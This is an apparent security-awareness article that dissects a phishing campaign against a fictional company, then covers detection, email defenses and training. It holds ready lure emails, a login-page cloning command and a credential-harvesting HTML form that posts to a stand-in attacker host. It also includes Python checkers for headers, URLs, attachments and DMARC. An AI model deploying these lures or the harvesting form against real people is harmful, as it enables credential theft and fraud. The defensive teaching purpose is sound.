# Social Engineering: Anatomy of a Phishing Attack

*Understand how attackers manipulate human psychology to bypass technical controls. Learn to identify phishing campaigns and build human firewalls.*
The most sophisticated firewall in the world can be defeated by one employee clicking a link.
Social engineering exploits the weakest link in any security system: humans. This article dissects how attackers manipulate psychology, and how to defend against it.
## Why Social Engineering Works

Humans are wired with cognitive biases that attackers exploit:
| Bias | Exploitation | Example |
|---|---|---|
| Authority | Impersonate someone important | "CEO" requests urgent wire transfer |
| Urgency | Force quick decisions | "Your account will be deleted in 24h" |
| Social Proof | "Everyone else does it" | "Your colleagues already signed up" |
| Reciprocity | Give something, ask something back | Free PDF → malicious macro |
| Fear | Threaten negative consequences | "Legal action if you don't respond" |
| Curiosity | Offer irresistible information | "Your salary review results attached" |
## Anatomy of a Phishing Campaign

### Phase 1: Reconnaissance

Attackers gather information before attacking:

```text
Target: Acme Corporation

LinkedIn scraping:
- CEO: John Smith
- CFO: Sarah Johnson
- IT Admin: Mike Chen

Email format discovered: [email protected]

Recent news: Acme acquiring StartupX
→ Pretext: "Due diligence documents for StartupX acquisition"

Technologies (from job postings):
- Microsoft 365
- Salesforce
- Slack
```
### Phase 2: Infrastructure Setup

```text
# Register lookalike domain
acme-corp.com → acme-c0rp.com (zero instead of 'o')
acmecorp.net
acme-corp-secure.com

# Set up mail server with SPF/DKIM
# (Makes emails look legitimate)

# Clone login page
wget -mk https://login.microsoftonline.com/
# Modify to capture credentials
```
### Phase 3: Crafting the Payload

The email:

```text
From: Sarah Johnson <[email protected]>
To: Mike Chen <[email protected]>
Subject: URGENT: StartupX Acquisition Documents - Need IT Review

Hi Mike,

John asked me to get IT sign-off on the security assessment
for the StartupX acquisition. Legal needs this by EOD.

Please review and approve: https://acme-c0rp.com/documents/review

Let me know if you have any questions.

Best,
Sarah

Sarah Johnson
CFO, Acme Corporation
[email protected]
+1 (555) 123-4567
```
Red flags (that tired employees miss):
- Spoofed sender domain (acme-c0rp.com)
- Urgency (“by EOD”)
- Authority (CEO request)
- Contextual relevance (real acquisition)
### Phase 4: Credential Harvesting

The link leads to a cloned Microsoft login:

```html
<!-- Looks identical to real login -->
<form action="https://attacker-server.com/harvest" method="POST">
  <input name="email" placeholder="Email">
  <input name="password" type="password" placeholder="Password">
  <button>Sign In</button>
</form>

<!-- After capture, redirect to real site -->
<script>
  // User thinks they mistyped password
  window.location = "https://login.microsoftonline.com";
</script>
```
### Phase 5: Post-Exploitation

With Mike’s credentials:
- Access Microsoft 365 → Read emails, SharePoint
- Find more targets, internal documents
- Set up mail rules to hide attacker activity
- Pivot to other systems using same credentials
## Types of Phishing Attacks

### Spear Phishing

Targeted attacks using personal information:

```text
"Hi John, saw your presentation at DefCon last week.
Here's that tool I mentioned: [malicious link]"
```

### Whaling

Targeting executives:

```text
"Board meeting rescheduled - new agenda attached"
[Malicious PDF exploiting Adobe Reader]
```

### Smishing (SMS Phishing)

```text
Your package couldn't be delivered.
Reschedule: https://dhl-track1ng.com/pkg/8273
```

### Vishing (Voice Phishing)

```text
"This is Microsoft Support. We detected a virus on
your computer. Please give me remote access to fix it."
```

### Business Email Compromise (BEC)

Impersonating executives for financial fraud:

```text
From: CEO (real but compromised account)
To: Accounts Payable

Please wire $47,000 to this account for a confidential
acquisition. Don't discuss with anyone - SEC regulations.
```
## Detection Techniques

### Email Header Analysis

```text
Received: from mail.acme-c0rp.com (185.234.xx.xx)
    by mx.acme.com (Postfix)
Return-Path: <[email protected]>
Reply-To: [email protected] ← Different from From!
```

Check:

- SPF/DKIM/DMARC results
- Received headers (trace the path)
- Reply-To mismatches
- X-Originating-IP
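The four checks above can be automated at the mail gateway or in a triage script. The following Python is an added example written for this article, not code from the original post: it parses a raw message with the standard `email` module and applies each check. The sample message, the `KNOWN_STAFF` directory, the addresses and the `198.51.100.23` address (a documentation-range placeholder) are all constructed; `analyze_headers` and the flag names are this example's own.

```python
"""Header red-flag checker. Added example, not code from the original article;
the message, staff directory, addresses and IP are all constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on the article's header excerpt (198.51.100.0/24
# is a documentation range, so the IP is a placeholder, not an indicator).
SAMPLE_RAW = """\
Received: from mail.acme-c0rp.com (198.51.100.23)
 by mx.acme.com (Postfix) with ESMTP id 4F2A1B
Return-Path: <sarah.johnson@acme-c0rp.com>
Authentication-Results: mx.acme.com; spf=pass smtp.mailfrom=acme-c0rp.com; dkim=none; dmarc=none
From: Sarah Johnson <sarah.johnson@acme-c0rp.com>
Reply-To: sjohnson.cfo@mail-example.net
To: Mike Chen <mike.chen@acme.com>
Subject: URGENT: StartupX Acquisition Documents - Need IT Review

Hi Mike, please review: https://acme-c0rp.com/documents/review
"""

# Constructed directory of display names the organisation actually uses.
KNOWN_STAFF = {"sarah johnson", "john smith", "mike chen"}


def domain_of(header_value):
    """Lowercase domain of the first address in a header value ('' if none)."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def auth_results(msg):
    """Pull the spf=/dkim=/dmarc= verdicts out of Authentication-Results."""
    text = (msg.get("Authentication-Results") or "").lower()
    return dict(re.findall(r"\b(spf|dkim|dmarc)=([a-z]+)", text))


def analyze_headers(raw, org_domain, known_staff=KNOWN_STAFF):
    """Return the list of red flags found in a raw RFC 5322 message."""
    msg = message_from_string(raw)
    flags = []
    display, _ = parseaddr(msg.get("From", ""))
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    return_dom = domain_of(msg.get("Return-Path"))

    # Reply-To routes answers to a domain other than the visible sender.
    if reply_dom and reply_dom != from_dom:
        flags.append("reply-to-mismatch")
    # Envelope sender (Return-Path) not aligned with the From domain.
    if return_dom and return_dom != from_dom:
        flags.append("return-path-mismatch")
    # Display name of an internal employee on an address outside the org.
    if display.lower() in known_staff and from_dom != org_domain:
        flags.append("display-name-impersonation")
    # SPF "pass" for the attacker's own lookalike domain is expected (they set
    # it up); what matters is whether DMARC passed for the From domain.
    if auth_results(msg).get("dmarc") != "pass":
        flags.append("dmarc-not-pass")
    # Received headers are prepended by each hop, so the last one is the
    # first hop: the host that actually handed the message to our MX.
    received = msg.get_all("Received") or []
    first_hop = re.search(r"from\s+(\S+)\s+\(([\d.]+)\)", received[-1]) if received else None
    if first_hop and not first_hop.group(1).lower().endswith("." + org_domain):
        flags.append("external-origin:%s:%s" % first_hop.groups())
    return flags


if __name__ == "__main__":
    for flag in analyze_headers(SAMPLE_RAW, "acme.com"):
        print("RED FLAG:", flag)
```

Note the order of the Received check: each relay prepends its own header, so the last `Received` line in the message is the hop closest to the sender. Trusting the first line instead would let an attacker pre-seed a fake internal hop.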
### URL Analysis

```text
Legitimate: https://login.microsoftonline.com/

Phishing:   https://login.microsoftonline.com.attacker.com/
            https://login-microsoftonline.com/
            https://microsoft.login.com.phishing.site/auth
            https://bit.ly/3xYz123 (shortened)
```

Techniques:

- Hover before clicking
- Check for typosquatting
- Expand shortened URLs
- Verify SSL certificate
### Attachment Analysis

```bash
# Check file type
file suspicious.pdf
# PDF document, version 1.7

# Look for JavaScript in the extracted text
# (pdftotext only sees visible text; pdfid below inspects the PDF objects)
pdftotext suspicious.pdf - | grep -i javascript

# Check for embedded objects
pdfid suspicious.pdf
# /JS: 1          ← JavaScript present
# /OpenAction: 1  ← Runs on open
```
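Here is the same triage as a script, as an added example that is not part of the original article: it reproduces the `pdfid` keyword count in a few lines of Python and adds the file-name checks (double and executable extensions) and the encrypted-ZIP check from the red-flag checklists. The PDF and ZIP byte strings are constructed and inert; they only carry the object names and header flag a scanner looks for. `DANGEROUS_EXT`, `PDF_KEYWORDS`, `triage_attachment` and the verdict names are this example's own choices.

```python
"""Attachment triage. Added example (not from the article); every byte string
below is constructed and inert, it only carries the names a scanner looks for."""
import re

# Minimal PDF with the two pdfid hits the article shows (/JS, /OpenAction).
SUSPICIOUS_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
3 0 obj << /S /JavaScript /JS (app.alert('x')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
# ZIP local file header: general-purpose flag field (offset 6), bit 0 = encrypted.
ENCRYPTED_ZIP = b"PK\x03\x04\x14\x00\x01\x00" + b"\x00" * 22

DANGEROUS_EXT = {"exe", "scr", "js", "vbs", "hta", "bat", "cmd", "ps1", "jar", "lnk"}
# Name objects pdfid counts; the first three are the ones the article points at.
PDF_KEYWORDS = (b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile")


def filename_flags(name):
    """Flags derived from the file name alone (double and executable extensions)."""
    parts = name.lower().split(".")
    flags = []
    if len(parts) >= 3:                 # invoice.pdf.exe
        flags.append("double-extension")
    if parts[-1] in DANGEROUS_EXT:
        flags.append("executable-extension")
    return flags


def pdf_keyword_counts(data):
    """Count PDF name objects the way pdfid does (/JS must not match /JSx)."""
    counts = {}
    for kw in PDF_KEYWORDS:
        hits = re.findall(re.escape(kw) + rb"(?![A-Za-z])", data)
        if hits:
            counts[kw.decode()] = len(hits)
    return counts


def triage_attachment(name, data):
    """Return (verdict, flags); verdict is 'block', 'sandbox' or 'allow'."""
    flags = filename_flags(name)
    lower = name.lower()
    if lower.endswith(".pdf"):
        if not data.startswith(b"%PDF"):
            flags.append("magic-mismatch")   # claims to be a PDF but is not
        else:
            counts = pdf_keyword_counts(data)
            if "/JS" in counts or "/JavaScript" in counts:
                flags.append("pdf-javascript")
            if "/OpenAction" in counts or "/AA" in counts:
                flags.append("pdf-auto-action")
            if "/Launch" in counts:
                flags.append("pdf-launch")
    if lower.endswith(".zip") and data[:4] == b"PK\x03\x04" and len(data) > 6 and data[6] & 1:
        flags.append("encrypted-zip")        # cannot be scanned, hold for review
    if {"executable-extension", "double-extension", "pdf-launch"} & set(flags):
        return "block", flags
    return ("sandbox" if flags else "allow"), flags


if __name__ == "__main__":
    for name, data in [("suspicious.pdf", SUSPICIOUS_PDF), ("report.pdf", CLEAN_PDF),
                       ("invoice.pdf.exe", b"MZ\x90\x00"), ("docs.zip", ENCRYPTED_ZIP)]:
        print(name, triage_attachment(name, data))
```

The keyword regex stops at a non-letter so that `/JS` does not also count `/JavaScript`; a PDF with JavaScript and an `/OpenAction` is not proof of malice (forms use both), which is why the verdict is "sandbox" rather than "block" for that combination.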
## Technical Defenses

### Email Security

```text
# DMARC Policy (DNS TXT record)
_dmarc.acme.com: "v=DMARC1; p=reject; rua=mailto:[email protected]"

# Meaning:
# p=reject: Reject emails failing authentication
# rua:      Send aggregate reports to this address
```
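A record that exists but says `p=none` only monitors; spoofed mail is still delivered. As an added example (not from the article), this Python parses a DMARC TXT record into its tags and reports the settings that leave a gap: a non-reject policy, a weaker subdomain policy, a `pct` below 100 and a missing `rua` address. The sample records and the `dmarc-reports@acme.com` address are constructed; `assess_dmarc` and its issue codes are this example's own.

```python
"""DMARC record assessment. Added example, not code from the article; the
records and the reporting address are constructed."""

VALID_POLICIES = ("none", "quarantine", "reject")

# Constructed: the weak monitor-only record beside the enforcing one.
WEAK_RECORD = "v=DMARC1; p=none"
STRONG_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@acme.com"


def parse_dmarc(record):
    """Split 'v=DMARC1; p=reject; rua=...' into a tag dict; ValueError if not DMARC."""
    tags = {}
    for part in record.strip().strip('"').split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record: " + record)
    return tags


def assess_dmarc(record):
    """Return weakness codes; an empty list means the record rejects failing
    mail on the domain and its subdomains and reports failures to someone."""
    tags = parse_dmarc(record)
    issues = []
    policy = tags.get("p")
    if policy not in VALID_POLICIES:
        issues.append("missing-policy")
    elif policy != "reject":
        issues.append("policy-" + policy)      # none = monitor only, quarantine = spam folder
    # sp= defaults to p=, so only an explicit weaker subdomain policy is a finding.
    if policy == "reject" and tags.get("sp") in ("none", "quarantine"):
        issues.append("weak-subdomain-policy")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        issues.append("partial-pct")           # policy applied to only part of failing mail
    if not tags.get("rua", "").startswith("mailto:"):
        issues.append("no-aggregate-reports")  # abuse of the domain goes unseen
    return issues


if __name__ == "__main__":
    for rec in (WEAK_RECORD, STRONG_RECORD):
        print(rec, "->", assess_dmarc(rec) or "enforcing")
```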
### URL Filtering

```python
# Pseudocode: domain_age, known_brands, block() and quarantine()
# stand in for the mail gateway's own primitives

# Block newly registered domains
if domain_age < 30_days:
    block()

# Block lookalike domains
if levenshtein_distance(domain, known_brands) < 3:
    quarantine()
```
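The URL Analysis section above and the filtering sketch here call for the same logic, so this single added example (written for this article, not code from the original) covers both: it runs the four phishing URL shapes listed earlier through checks for IP-literal hosts, plain HTTP, shorteners, a brand name used as a subdomain label, and a registered domain that is a near-miss of a brand after folding digit homoglyphs such as `0` for `o`. `KNOWN_BRANDS` and `SHORTENERS` are constructed lists; `registered_domain` is a two-label simplification of what the Public Suffix List gives you; and `domain_age_days` is passed in as a parameter because the WHOIS/RDAP lookup that supplies it is outside this example.

```python
"""URL red-flag checks. Added example, not from the article; the brand and
shortener lists are constructed and the domain-age rule expects a value from
a WHOIS/RDAP lookup that this code does not perform."""
import ipaddress
from urllib.parse import urlsplit

KNOWN_BRANDS = {"microsoftonline.com", "microsoft.com", "acme.com", "acme-corp.com"}
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com"}
# Digits attackers swap for look-alike letters (acme-c0rp, m1crosoft).
HOMOGLYPHS = str.maketrans("0135", "oles")


def levenshtein(a, b):
    """Edit distance between two strings (row-by-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_domain(host):
    """Last two labels of the host. Simplification: production code should use
    the Public Suffix List so suffixes like co.uk are handled."""
    return ".".join(host.split(".")[-2:])


def analyze_url(url, domain_age_days=None, brands=KNOWN_BRANDS):
    """Return the list of red flags for a URL; an empty list means none fired."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower().rstrip(".")
    flags = []
    if parts.scheme == "http":
        flags.append("plain-http")
    try:
        ipaddress.ip_address(host)
        flags.append("ip-literal-host")
        return flags
    except ValueError:
        pass
    reg = registered_domain(host)
    if reg in SHORTENERS:
        flags.append("shortened-url")        # expand before judging the target
    if reg in brands:
        return flags                         # genuine brand domain
    if domain_age_days is not None and domain_age_days < 30:
        flags.append("newly-registered")
    # Brand name used as a subdomain label: login.microsoftonline.com.attacker.com
    brand_labels = {b.split(".")[0] for b in brands}
    if any(label in brand_labels for label in host.split(".")[:-2]):
        flags.append("brand-in-subdomain")
    # Registered domain that is a near-miss of a brand, after homoglyph folding.
    sld = reg.split(".")[0].translate(HOMOGLYPHS)
    ordered = sorted(brands, key=lambda b: (-len(b), b))   # longest brand wins ties
    lookalike = [b for b in ordered if levenshtein(sld, b.split(".")[0]) < 3]
    embedded = [b for b in ordered if b.split(".")[0] in sld]
    if lookalike:
        flags.append("lookalike:" + lookalike[0])
    elif embedded:
        flags.append("brand-embedded:" + embedded[0])
    return flags


if __name__ == "__main__":
    for u in ("https://login.microsoftonline.com/",
              "https://login.microsoftonline.com.attacker.com/",
              "https://login-microsoftonline.com/",
              "https://microsoft.login.com.phishing.site/auth",
              "https://bit.ly/3xYz123",
              "https://acme-c0rp.com/documents/review"):
        print(u, "->", analyze_url(u) or "no flags")
```

The lookalike test is applied to the registered domain only: `login.microsoftonline.com.attacker.com` is not a typo of anything, its registered domain is simply `attacker.com`, and the brand string in front of it is the tell. Hosts that pass every check are still worth resolving through the shortener and checking against the certificate, as the technique list says.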
### Multi-Factor Authentication

Even if credentials are phished:

```text
Attacker has: username + password
MFA blocks:   no access without second factor

# But beware: real-time phishing proxies can capture MFA
# Use hardware keys (FIDO2/WebAuthn) for high-value targets
```
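Why a hardware key survives a real-time proxy where a one-time code does not comes down to origin binding: the browser, not the page, writes the origin it is on into the signed client data, and the relying party refuses anything signed for another origin. The following Python is an added model of that ceremony, not code from the article or from any WebAuthn library, and it simplifies deliberately: an HMAC with a per-credential secret stands in for the authenticator's per-credential private-key signature so that it runs on the standard library alone. The `Authenticator`, `RelyingParty` and `browser_get_assertion` names, the `acme.com` relying party and the `acme-c0rp.com` proxy page are all this example's constructions.

```python
"""Origin binding in FIDO2/WebAuthn, modelled. Added example; HMAC stands in
for the real asymmetric signature and all names/origins are constructed."""
import base64
import hashlib
import hmac
import json
import os


def sha256(data):
    return hashlib.sha256(data).digest()


class Authenticator:
    """Model of a hardware key: one secret per relying-party ID (rpId)."""
    def __init__(self):
        self.credentials = {}

    def register(self, rp_id):
        key = os.urandom(32)
        self.credentials[rp_id] = key
        return key          # the RP stores this to verify later assertions

    def get_assertion(self, rp_id, origin, challenge):
        """Sign over rpIdHash || SHA-256(clientDataJSON). The origin is supplied
        by the browser from the page it is actually on, never by the page."""
        if rp_id not in self.credentials:
            raise KeyError("no credential registered for " + rp_id)
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                                  "origin": origin}, sort_keys=True).encode()
        auth_data = sha256(rp_id.encode())
        sig = hmac.new(self.credentials[rp_id], auth_data + sha256(client_data),
                       hashlib.sha256).digest()
        return client_data, auth_data, sig


def browser_get_assertion(authenticator, page_origin, rp_id, challenge):
    """Browser-side rule: the requested rpId must be the page's host or a parent
    domain of it, so a look-alike domain cannot ask for the real site's key."""
    host = page_origin.split("://", 1)[1].split("/")[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise ValueError("rpId %r is not a registrable suffix of %s" % (rp_id, page_origin))
    return authenticator.get_assertion(rp_id, page_origin, challenge)


class RelyingParty:
    def __init__(self, rp_id, origin):
        self.rp_id, self.origin = rp_id, origin
        self.key = None
        self.pending = set()            # challenges issued but not yet used

    def begin_login(self):
        challenge = base64.urlsafe_b64encode(os.urandom(16)).decode()
        self.pending.add(challenge)
        return challenge

    def verify(self, client_data, auth_data, sig):
        cd = json.loads(client_data)
        if cd.get("type") != "webauthn.get":
            return False, "wrong ceremony type"
        if cd.get("challenge") not in self.pending:
            return False, "unknown or replayed challenge"
        if cd.get("origin") != self.origin:
            return False, "origin mismatch"     # signed for a phishing page
        if auth_data != sha256(self.rp_id.encode()):
            return False, "rpIdHash mismatch"
        expected = hmac.new(self.key, auth_data + sha256(client_data), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, sig):
            return False, "bad signature"
        self.pending.discard(cd["challenge"])   # one challenge, one login
        return True, "ok"


def scenario():
    """Legitimate login, a proxy page at acme-c0rp.com, and a replay; returns verdicts."""
    rp = RelyingParty("acme.com", "https://login.acme.com")
    auth = Authenticator()
    rp.key = auth.register("acme.com")
    results = {}
    challenge = rp.begin_login()
    assertion = browser_get_assertion(auth, "https://login.acme.com", "acme.com", challenge)
    results["legitimate"] = rp.verify(*assertion)
    results["replay"] = rp.verify(*assertion)
    relayed = rp.begin_login()          # the proxy relays the real site's challenge
    try:
        browser_get_assertion(auth, "https://acme-c0rp.com", "acme.com", relayed)
        results["proxy_browser_check"] = "assertion produced"
    except ValueError:
        results["proxy_browser_check"] = "browser refused rpId"
    # Even if that browser rule were bypassed, the RP still sees the wrong origin.
    forged = auth.get_assertion("acme.com", "https://acme-c0rp.com", relayed)
    results["proxy_rp_check"] = rp.verify(*forged)
    return results


if __name__ == "__main__":
    for name, verdict in scenario().items():
        print(name, "->", verdict)
```

Contrast this with a TOTP code or a push approval: neither carries the origin, so a proxy can forward them unchanged. The model shows two independent stops for the proxy, the browser's rpId rule and the relying party's origin check, plus the single-use challenge that defeats replay of a captured assertion.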
## Building a Human Firewall

### Security Awareness Training

Effective training includes:
- Simulated phishing — Monthly campaigns
- Immediate feedback — “You clicked a test phishing link”
- Positive reinforcement — Reward reporting, not punishment
- Role-specific training — Finance gets BEC training
### Reporting Culture

Good: "I clicked something suspicious and reported it immediately"
Bad: "I clicked something suspicious and hoped no one noticed"
Make reporting easy:

- Outlook “Report Phishing” button
- Slack command: `/report-phish`
- No-blame policy
### The “Trust But Verify” Protocol

For any unusual request (wire transfer, password reset, credential sharing):

1. Don't reply to the email
2. Contact the person through a known channel (a saved phone number, not one taken from the email signature)
3. Verify the request is legitimate
4. Document the verification
## Phishing Indicators Checklist

### Email Red Flags

□ Sender email doesn't match display name
□ Generic greeting ("Dear Customer")
□ Urgency or threats
□ Grammar/spelling errors (though AI is fixing this)
□ Unexpected attachments
□ Links don't match text (hover to check)
□ Requests for credentials or payment

### URL Red Flags

□ Misspelled domain
□ Extra subdomains (microsoft.com.attacker.com)
□ IP address instead of domain
□ HTTP instead of HTTPS
□ Shortened URLs from unknown sources

### Attachment Red Flags

□ Unexpected file types (.exe, .scr, .js)
□ "Enable Macros" prompt
□ Password-protected ZIP (evades scanning)
□ Double extensions (invoice.pdf.exe)
## Conclusion

Social engineering succeeds because it targets human nature, not technology. The best defense combines:
- Technical controls — Email filtering, MFA, URL analysis
- Process controls — Verification protocols for sensitive actions
- Human awareness — Continuous training and positive reporting culture
Remember: Attackers only need to succeed once. Defenders need to succeed every time. Make that “one time” as difficult as possible.
Next: Modern OSINT Tools — Learn what attackers can find about you.